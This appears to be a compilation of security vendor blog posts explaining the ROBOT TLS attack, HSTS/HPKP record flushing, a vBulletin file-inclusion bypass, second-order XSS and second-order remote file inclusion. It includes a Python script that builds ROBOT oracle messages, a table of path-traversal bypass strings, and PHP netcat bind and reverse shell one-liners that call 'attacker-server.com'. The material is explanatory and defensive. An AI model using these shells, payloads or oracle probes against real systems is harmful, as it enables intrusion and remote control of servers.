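    As an illustration only, the following Python sketch constructs the five message variants described above for a 2048-bit (256-byte) RSA key. It is a simplified reconstruction, not the researchers' tool, and each block would still have to be encrypted with the server's public key before being sent in the Client Key Exchange:

        import os

        KEY_LEN = 256                      # RSA modulus length in bytes (2048-bit key)
        TLS_VERSION = b"\x03\x03"          # TLS 1.2

        def nonzero_pad(length):
            # PKCS #1 v1.5 padding bytes must not contain 0x00
            return bytes(b % 255 + 1 for b in os.urandom(length))

        pre_master = TLS_VERSION + os.urandom(46)     # 48-byte pre-master secret
        pad_len = KEY_LEN - 3 - len(pre_master)

        messages = {
            # 1. Correctly formatted TLS message
            "correct":        b"\x00\x02" + nonzero_pad(pad_len) + b"\x00" + pre_master,
            # 2. Incorrect padding (wrong first bytes)
            "wrong_first":    b"\x41\x17" + nonzero_pad(KEY_LEN - 2),
            # 3. 0x00 byte in the wrong position (unpadded value has an invalid length)
            "wrong_position": b"\x00\x02" + nonzero_pad(KEY_LEN - 11) + b"\x00" + os.urandom(8),
            # 4. Missing 0x00 separator byte
            "no_separator":   b"\x00\x02" + nonzero_pad(KEY_LEN - 2),
            # 5. Wrong TLS version inside the pre-master secret
            "wrong_version":  b"\x00\x02" + nonzero_pad(pad_len) + b"\x00" + b"\x02\x02" + os.urandom(46),
        }

        for name, message in messages.items():
            assert len(message) == KEY_LEN, name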

    How Hackers Reveal the ROBOT Vulnerability

    To construct all these padding variations, and get an oracle from the server, an attacker proceeds as follows:

    1. First, they start a TLS-RSA handshake and acquire the server certificate from the 'Server Hello' message.
    2. Next, they create CKE messages, as described above. Padding length should match the server certificate's public key length (key size of the public key, in bytes). Then, they encrypt the pre-master secrets using the server's public key.
    3. Next, they send constructed CKE variations, followed by valid Change Cipher Spec (CCS) and Finished messages. This is referred to as the 'Message Flow'.
    4. If the response is not the same for each test case, the target can be presumed to be vulnerable.
    5. If not, the attacker sends the same CKE messages but without following up with CCS and Finished messages (a shortened message flow), and waits for the Timeout.
    6. Again, if the response is not the same for each test case, the target can be presumed to be vulnerable.

    When testing with the shortened Message Flow, it is necessary to set an appropriate Socket Timeout for the network path between the client and the server.

    ROBOT Impact and Remediation

    When the ROBOT vulnerability was first discovered, it was estimated that "almost a third of the top 100 domains in the Alexa Top 1 Million list, among them Facebook and Paypal" were vulnerable to this type of attack. In addition, many other vendors and open source projects were also found to be vulnerable.

    For a complete list of who is affected, refer to the ROBOT Attack website. If you use one of the products that provides a fix, you should, of course, install the update.

    Do Not Use RSA Encryption Modes!

    However, to prevent such vulnerabilities on your host, it would be better to disable RSA encryption modes. This is not the first time a variation of Bleichenbacher's padding oracle attack has surfaced to exploit RSA encryption modes. Previously there was another attack, DROWN (Decrypting RSA with Obsolete and Weakened eNcryption), which also allowed an attacker to break the encryption. Moreover, RSA encryption modes also lack forward secrecy.

    In a nutshell, the fact that RSA encryption modes are so exploitable means that disabling them is the best policy. This refers to all ciphers that begin with 'TLS_RSA'. This does not include ciphers that use RSA signatures and include 'DHE' or 'ECDHE' in their name; they are unaffected by the ROBOT attack.

    Scanning for the ROBOT Vulnerability with Netsparker

    We released a Netsparker web application security scanner hotfix version that included ROBOT checks on December 22. To make sure Netsparker includes the ROBOT checks in your next scan, simply open the relevant Scan Policy and enable the SSL Security Check Group.


    In addition, if you only want to check your host for the ROBOT vulnerability, you can create a new Scan Policy with only the SSL Security Check group enabled.

    To limit the scan to SSL checks only you can also disable JavaScript Analyzer in the Scan Policy, and run the scan with the Scan Imported Links Only option by adding your host's root path to Imported Links. Remember that a host can run different TLS stacks on different domains. Often the host starting with 'www' is served by a different TLS stack than the host without the 'www' prefix. Therefore, add both forms to Imported Links, or scan both.

    The ROBOT Attack Whitepaper

    For all the technical details on the ROBOT attack, read the Return Of Bleichenbacher’s Oracle Threat (ROBOT) whitepaper by Hanno Böck, Juraj Somorovsky and Craig Young.

    Netsparker's Weekly Security Roundup 2017 - Week 52


    Preload Saves Lives

    Thanks to Google and projects such as Let’s Encrypt, there are more websites running on SSL/TLS now than a few years ago, which means the internet in general is getting more secure.

    The HTTP Strict Transport Security (HSTS) Preload List is a key element of SSL/TLS for web browsers. The problem is that if a website makes traffic encryption optional, it can be bypassed by Man in the Middle (MiTM) attacks.

    Moxie Marlinspike (pseudonym), founder of Open Whisper Systems, is an American security researcher who demonstrated at Black Hat in 2009 how he was able to prevent victims from using secure HTTPS connections and force them to use an unencrypted, plain HTTP connection instead. In order to do this, he leveraged his SSLStrip tool. Theoretically, when a secure connection is established, it ensures both security and privacy. However, to establish a truly secure connection, HSTS is required. Websites that have HSTS configured instruct users' browsers to convert all future links to HTTPS.

    Perhaps you're thinking: "But I could just disable port 80. I could set up a routing process on the server side." The problem is that this still won't be enough to emulate the features HSTS provides. Let's take a closer look. Assume that you disable port 80 and start accepting connections only through port 443. A hacker could establish a secure connection between himself and the user's browser, and between your site and himself, and present a fake certificate to the browser – a classic MiTM attack. There is one catch: browsers have mechanisms to prevent this type of attack.

    For instance, if the certificate is invalid or expired, or has a weak cipher, browsers will warn the user that something went wrong. The problem is that users can simply choose to ignore these warnings by clicking the Add Exception or Go Anyway buttons. Users are not always technically savvy. If you are unfamiliar with computers, and there is a warning with technical details such as 'ERR_CERT_AUTHORITY_INVALID', it's close to impossible to find out what's going on. However, if there is a button on the page that lets you continue to the site despite the error, why not just click it?

    When the HSTS header is set for a web application, the user's browser converts HTTP links that reference the web application to their secure HTTPS equivalent, at least for the time specified in the max-age option of the HSTS header. But more importantly, if a browser encounters invalid certificates, the Add Exception and Go Anyway buttons are disabled, which means that there is no way for users to ignore these errors. You might argue that the TLS warnings in most browsers are clear indicators that something is wrong and that you shouldn't continue. And that's probably true for a majority of users. However, sometimes you need to make sure that users don't even have the option to ignore the warnings in security-critical applications. Banking, insurance and e-commerce web applications are just a few examples of the types of websites that can benefit from HSTS.

    This should account for any mistakes that users could possibly make, but what if the mistake is a little bit higher up the chain of trust? Let's say one of the certificate authorities in the browser trust chain is hacked, and a certificate is signed on behalf of your website? It is obvious that none of the security benefits of the HSTS header apply here, since the attacker is in possession of a valid certificate. This scenario seems far fetched, but in 2011, Dutch certificate issuer DigiNotar was hacked and 500 certificates were signed in their name by attackers. Google quickly discovered the fake certificates via the Public Key Pinning feature they built into Chrome for Google domains. In the process, they removed DigiNotar from their list of trusted certificate issuers and the company was declared bankrupt the very same month! This highlights a few salient points about TLS: browser vendors take vulnerabilities regarding encryption very seriously, they hold certificate issuers to high standards and they won't fail to punish those who don't comply with them – by no longer trusting the certificates they've signed.

    Certificate Transparency

    When a Certificate Authority (CA) signs a certificate for a site, currently it is not required to notify the owner of that site. This is obviously a problem and shouldn't be the standard. However, there is now a mechanism that will submit each issued TLS certificate to a public log. It's called Certificate Transparency (CT). While purely voluntary for now, it will become mandatory in the near future. The CT program will provide an open and almost real-time monitoring system for TLS certificates, making it more difficult both for CAs to erroneously issue them and for hackers to illegitimately acquire them.

    HTTP Public Key Pinning

    For now, though, how do we get ahead of this problem? How do we prevent hackers from signing certificates on behalf of our web pages – without our permission?

    Unfortunately, we can't! However, what we can do is prevent the use of these certificates, thanks to HTTP Public Key Pinning (HPKP) technology – at least for now. The problem with HPKP is that it's incredibly difficult for the average webmaster to get right. If you do something wrong, you might render your website useless for a very long time and there is nothing you can do about it. To understand why, we need to take a look at how HPKP works.

    Since Google Chrome 13, websites can send their certificate's public key fingerprint (a hash of the server's public TLS key) to the browser using the Public Key Pinning HTTP response header. Browsers store these fingerprints locally, together with the hostname to which they belong. When a user establishes a connection to the website, and the browser encounters a certificate other than the pinned one, it refuses to establish a secure connection, and can even report the URL to a designated endpoint using the report-uri field. The Public Key Pinning feature allows us to protect our users and websites in a circumstance in which the authorities required to secure communications are somehow duped into signing a fake certificate.
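    A typical pinning response header might look like the following; the pin values are illustrative placeholders for base64-encoded SHA-256 hashes of the pinned public keys, and a backup pin is required:

        Public-Key-Pins: pin-sha256="<base64 hash of the current public key>"; pin-sha256="<base64 hash of a backup key>"; max-age=5184000; includeSubDomains; report-uri="https://example.com/hpkp-report"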

    So what happens if you lose access to your private key? The simple answer is: every user who has already visited your website will lose access to it for as long as the public key is pinned. Whenever they want to visit your website again, they will receive an error message, because the public key does not match the pinned one. This is why browser vendors have been looking for alternatives to HPKP that don't affect users as much. With HPKP heading for deprecation, you can either:

    • Rely on the CA to respect the choice of authority allowed in the CAA DNS entry, or
    • Check the CT log to determine whether there is a certificate signed on behalf of your site through one of the CT websites such as crt.sh

    The Certificate Transparency program becomes mandatory from April 2018. Google has announced that each newly signed certificate must be included in this log, otherwise the connection will be refused by the browser. If, for example, a ten-year certificate was signed on your behalf prior to 2018, you can block such cases by configuring the Expect-CT header in Enforce mode.

    The advantage of these two security headers (HSTS and HPKP) is that they enforce certain browser behavior for the time (in seconds) specified in the max-age directive. For this reason, it is necessary to keep max-age refreshed by responding with the HSTS and HPKP headers each time.

    If any of the local HSTS or HPKP records that browsers store on the user's file system are deleted or expire, these strict security mechanisms will obviously have no effect. Did we say they can be deleted? Yes!

    According to a presentation delivered by ElevenPaths at Black Hat 2017, it is possible to wipe or disable the cache of HSTS records in all major browsers (i.e. Firefox, Chrome, Edge and IE). This is done by exceeding the available space for these lists.

    In Google Chrome, we can query the HSTS and HPKP lists from chrome://net-internals/#hsts. Unfortunately in Firefox there is no way to view these lists. However, you can access them using the PinPatrol addon which was developed by ElevenPaths.

    Firefox uses a TXT file limited to 1024 lines to manage HSTS and HPKP lists. PinPatrol's Firefox addon can also display this TXT file.

    You might think that 1024 entries are more than enough for a regular user. However, for an attacker who wants to push the limits, it is exactly this limit that can be used as a vector for new attacks.

    How Can Hackers Use Firefox's Score Value?

    When more than 1024 entries are entered, Firefox deletes the old entries in the list to make space for new ones. And, Firefox uses an interesting detail: the Score value. The Score value indicates how often a site has been visited by a user on different days. For example, if a site is visited by a user for the first time (or if the values which are set by the site have expired) this value is set to '0'. If it is visited again the next day, the value is updated to '1'. On a subsequent visit on another day, it is updated to '2'. This value is updated every time a user visits a site. When the list reaches a size of 1024 lines, it deletes the record with the lowest Score to make space for new entries.

    The researchers from ElevenPaths used the site cloudpinning.com, and wrote JavaScript code that would open a connection to 1500 of its subdomains. For each of them, they issued a new HSTS header. As you might imagine, this would flush all the entries with a score of '0' out of the previous list. This is exactly what happened. When they stuffed 1500 subdomains into a list that could only hold 1024, the records with the lowest scores were deleted.

    Can website records with a Score value of '1' or higher also be deleted? Researchers repeated the same attack the next day, raising the Score of the subdomains of cloudpinning.com by one point. They were able to delete records where the Score value was '0' or '1'.

    But how realistic is it that they were able to repeat the same attack on another day? The researchers recommend Delorean, a Network Time Protocol (NTP) MiTM tool, instead. NTP is a relatively old protocol; it predates SSL by about ten years. It is, therefore, easy to manipulate the time on some Mac and Linux machines, just by intercepting NTP traffic and sending back the wrong timestamps to the machines. For more information about Delorean, see Bypassing HTTP Strict Transport Security, a study written by Jose Selvi for Black Hat 2014.

    What Happens When Records are Deleted?

    HSTS and HPKP headers are valid starting from the date they were added to the list, and expire after the time specified in the max-age header. But, once they are deleted from the list, there is no way for the browser to remember whether or not the site previously sent a HSTS header. Therefore it becomes possible to conduct an MiTM attack.

    What About the Chrome and Edge Browsers?

    There is no concept similar to the Score value, or any site record limit, in Chrome. Instead Chrome simply stores the HSTS and HPKP values in a JSON file: C:\Users\USERNAME\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity. In theory, you could enter an infinite amount of records into this file either through an MiTM attack or simply using your own server, as explained above. However, in practice, limitations are imposed by the available memory on the victim's machine.

    Currently, what an attacker can do is make the browser issue thousands of requests, with each response containing the maximum number of public key pins and an HSTS header. During their tests, the researchers found that after about ten minutes, the JSON file reached an approximate size of 500 MB, the browser froze and it was rendered useless. Even restarting the browser could not return it to a usable state, and their only option was to delete the JSON file.

    IE/Edge

    There is an API, or function, that manages the HSTS list for IE and Edge browsers. It is called HttpIsHostHstsEnabled and is stored in the WININET.DLL file. Unfortunately there is no formal documentation for it.

    Microsoft stores the HSTS data in a database called the Extensible Storage Engine (ESE). The data used by this database is stored in the WebCache directory, under the user profile directory, with the name WebCacheV01.dat. However, as with its counterparts in Chrome and Firefox, the storage mechanism is far from perfect.

    For some reason, HSTS does not work as expected in the IE/Edge browser. The table only contains the data of the most popular domains.

    When the researchers sent 131 requests to their test site (cloudpinning.com), they noticed that there was no change in the HSTS table, even when they restarted both the browser and the computer.

    What is the Solution?

    If it wasn't for the above-mentioned vulnerabilities, HSTS would sound like a great invention. Even though just a few years ago almost every connection that your browser established with a website was completely unencrypted, browser vendors now take TLS bugs very seriously. It comes as no surprise that browser vendors have already taken precautions that counter the shortcomings of HSTS. The solution comes in the form of Preload Lists.


    An HSTS Preload List is a file that is delivered together with your browser when you download it. Instead of relying on a dynamic list, like the ones that the researchers showed to be vulnerable, the site that should be protected by HSTS security features is included directly in the browser's source. Therefore there is no reliance on the Trust On First Use protocol. Instead, the browser immediately knows that the site wants HSTS to be enabled. However, to qualify for inclusion in an HSTS Preload List, your site must meet the following criteria:

    1. A valid TLS certificate
    2. Use of the same host when redirecting from HTTP to HTTPS
    3. All subdomains must be served over a secure connection, including www
    4. The max-age value in the HSTS header must be set to at least 18 weeks (i.e. 10886400 seconds), and the includeSubDomains and preload directives must be present in the HSTS header:

    Strict-Transport-Security: max-age=10886400; includeSubDomains; preload

    For further information, see the slides the researchers published for Black Hat EU 2017, Breaking Out HSTS (and HPKP) on Firefox, IE/Edge and (Possibly) Chrome.

    Two Critical Vulnerabilities in vBulletin

    vBulletin is a very popular forum script which is also commonly found on websites in the Alexa Top 1 Million.

    According to an independent researcher's report, vBulletin contains both a local file inclusion (LFI) vulnerability and an arbitrary file deletion vulnerability. The most striking aspect of the report is that the researchers have been trying to reach vBulletin's developers since November 21, 2017, but they have been unable to secure a response! Consequently, there is no published patch for these vulnerabilities.

    In this section, we will only focus on the details of the LFI vulnerability.

    The Cause of the Local File Inclusion Vulnerability

    The GET parameter vulnerable to the LFI is called routeString. Whenever you pass that parameter to the index.php file, vBulletin conducts a variety of checks on the value. It checks whether or not the supplied value contains one or more forward slashes, or whether you've attempted to pass the path to a gif, png, jpg, css or js file. In order to detect this, it will simply check for the value following the final period (.) character.

    The table below shows how it works.

    String                     Passes   Reason
    index.php                  Yes      No '/' or forbidden extensions
    test.gif                   No       The file has the extension 'gif' after the final period
    ../../etc/passwd           No       There are forward slashes
    ....\\logs\\access.log     Yes      No forbidden extensions or forward slashes
    test.gif.                  Yes      No forbidden extensions after the final period


    As you see, the first three rows don't yield any surprises. index.php is allowed, as expected, and the other two are blocked. The last two, however, are unintended. Let's start with the 'test.gif.' input. Why does it pass the check?

    As mentioned, vBulletin only checks whether or not there is a forbidden extension after the final period. However, since there is another period right after the gif extension, vBulletin will return an empty string. This would probably be the correct check on a Linux system, but it doesn't take into consideration that in Windows, there is certain behaviour that doesn't play along. When Windows encounters a file that has one or more trailing dots, it simply strips all of them out. So, while vBulletin sees a file called 'test.gif.' with a trailing dot, Windows returns the content of 'test.gif' instead. This means that the extension check is bypassed.

    But why does '..\something' also pass the check? Unfortunately, vBulletin has, yet again, forgotten to take the Windows file system into consideration. While banning the use of forward slashes might be enough to prevent LFI in a Linux environment, in Windows, backslashes can have the exact same purpose (directory separators). That's why the LFI vulnerability is restricted to Windows machines and why this particular input works and bypasses the filter. If you included a file like the server's access log, you could turn a simple file inclusion into a remote code execution.
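    A simplified reconstruction of the described check, written in Python for illustration (this is not vBulletin's actual code), makes it obvious why the last two table rows slip through:

        FORBIDDEN_EXTENSIONS = {"gif", "png", "jpg", "css", "js"}

        def passes_check(route_string):
            # Forward slashes are rejected outright
            if "/" in route_string:
                return False
            # Only the text after the *final* period is treated as the extension
            extension = route_string.rsplit(".", 1)[-1].lower()
            return extension not in FORBIDDEN_EXTENSIONS

        print(passes_check("index.php"))                  # True  - allowed, as intended
        print(passes_check("test.gif"))                   # False - blocked, as intended
        print(passes_check("../../etc/passwd"))           # False - blocked (contains '/')
        print(passes_check(r"....\\logs\\access.log"))    # True  - backslashes are never checked
        print(passes_check("test.gif."))                  # True  - extension after the final '.' is empty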

    To learn more about the details of this LFI, see SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution.

    Security Researchers Need to be More Creative!

    Among web security professionals there is an important rule: Do not trust data from the user!

    But user data doesn't necessarily mean a POST parameter or some JSON data. Instead, user-controlled values can occur in the strangest of places. We generally refer to them as 'second order' vulnerabilities, and Robert Salgado has shown a few unexpected sources of user input that lead to real life vulnerabilities.

    In the first example in the report, the researcher showed how an XSS payload was injected into the PowerDNS web interface – through DNS queries! Within the blog post, they show how an attacker might issue a DNS query containing an XSS payload, and that the payload sent via the DNS query was executed in the PowerDNS console.

    In the second example, the researcher explained the impact of a vulnerability in the SSL Tester tool, which Robert Salgado reported to Symantec three years ago. If you uploaded an SSL certificate whose common name contained an XSS payload, the website would reflect it back to you without sanitizing the output – a classic XSS vulnerability. The screenshot in the researcher's write-up illustrates that the payload was executed: it shows the content of the user's cookies in an alert popup.

    The final example provided by the researcher is the Rough Auditing Tool for Security (RATS) application developed by CERN's Computer Security Department. It is a static code analysis program that has not been updated since 2013. The program can generate a report in HTML format. Unfortunately, this feature of the application can also be used as an attack vector for XSS payloads. As illustrated in the article, the attacker uses XSS payloads as file names in the operating system, which you can see if you run the ls -l command. To exploit this, you have to use the analysis tool to scan a malicious application that contains an XSS payload in one of its filenames. In the screenshot included in the write-up, you can see that the XSS payload was executed successfully: the alert popup displays the text specified in the payload.

    The moral of the story is:

    • Code injections are not always executed via HTTP requests
    • Practically every point in the file system (i.e. logs, API messages or database records) can be attacked, and these points should all be taken into consideration
    • It is necessary to apply sanitization depending on the output context, as the sketch below illustrates
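    As a minimal illustration of that last point, the escaping routine has to match the output context; the following Python sketch uses only the standard library and is not tied to any particular framework:

        import html
        from urllib.parse import quote

        user_input = '"><script>alert(document.cookie)</script>'

        # HTML body or quoted attribute context: encode <, >, & and quotes
        safe_html = html.escape(user_input, quote=True)

        # URL context (e.g. a query-string parameter): percent-encode instead
        safe_url_param = quote(user_input, safe="")

        print(safe_html)       # &quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
        print(safe_url_param)  # %22%3E%3Cscript%3E...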

    Netsparker Sponsors OWASP AppSec California 2018



    Netsparker is sponsoring and exhibiting at OWASP AppSec California 2018. The conference will be held on January 30-31 at the Annenberg Community Beach House, Santa Monica, California.

    Join Us at Booth 27 at OWASP AppSec California 2018

    Come and visit us at Booth 27 in the exhibitor area, to learn how our Proof-Based Scanning Technology can help you save both time and money when automatically detecting vulnerabilities in the OWASP Top 10 list.

    For more information about the conference, visit the official OWASP AppSec California 2018 website.

    30% Off Promotional Code for OWASP AppSec California 2018!

    Use the Promotional Code Netsparker30OFF when buying your OWASP AppSec California 2018 Conference Ticket to get a 30% discount.

    Second-Order Remote File Inclusion (RFI) Vulnerability Introduction & Example


    The main difference between a Remote File Inclusion (RFI) vulnerability and a second-order one is that in a second-order RFI, attackers do not receive an instant response from the web server, so it is more difficult to detect. This is because the payload that the attacker uses to exploit the vulnerability is stored and executed at a later stage.

    Exploiting a Second-Order Remote File Inclusion Vulnerability

    Imagine a website that allows users to submit links through a web form. These submissions are later reviewed by a moderator, on a control panel that directly adds the remote content into the page. If an attacker manages to use the form to submit a remote website containing a dangerous payload, this payload will be executed once the moderator opens the page.

    This means that the attacker's included file will still be executed on the web server. However, the attacker cannot use a guided web shell with a user interface to issue commands, as the admin is the only one who would see the output. So they have to resort to alternative techniques, such as spawning a bind or reverse shell.

    A bind shell listens on a specific web server port and binds a shell (such as Bash) to it. Once the attacker connects, they are able to execute commands. This will not work, however, if a firewall is in place that prevents non-whitelisted ports from receiving incoming connections.

    <?php
    // Bind shell: listen on port 4444 and attach /bin/bash to any incoming connection
    system('nc -lp 4444 -e /bin/bash');

    A reverse shell does the same, but instead of listening on the web server, it actively initiates a connection to the attacker’s machine. This bypasses the firewall rule, since this connection is outgoing, not incoming.

    <?php
    // Reverse shell: connect back to the attacker's host on port 4444 and attach /bin/bash
    system('nc attacker-server.com 4444 -e /bin/bash');

    Another method, which is often used in automated exploitation by malicious hackers, is hard-coding the command that installs malware on the server into the included file, without further possibility of interaction. The malware in this case is often a piece of code that connects back to a command and control server, awaiting further instructions.

    How Does Netsparker Detect Second-Order RFI Attacks?

    This screenshot shows the RFI vulnerability as reported in Netsparker Desktop.


    As with other second-order and blind web application vulnerabilities, the Netsparker web application security solution probes the web application and sends a payload with a custom hash. That hash is used as a subdomain of our Netsparker Hawk testing infrastructure, which results in a URL like this:

    b92e8649b6cf4886241a3e0825bd36a262b24933.r87.me

    When the file inclusion is triggered at a later time, the vulnerability is exploited as follows:

    1. The web server tries to include a file under b92e8649b6cf4886241a3e0825bd36a262b24933.r87.me
    2. The Netsparker Hawk server responds with another payload containing code, which forces the web server to resolve yet another custom subdomain

    If the second DNS query is successful, Netsparker will confirm the blind RFI.
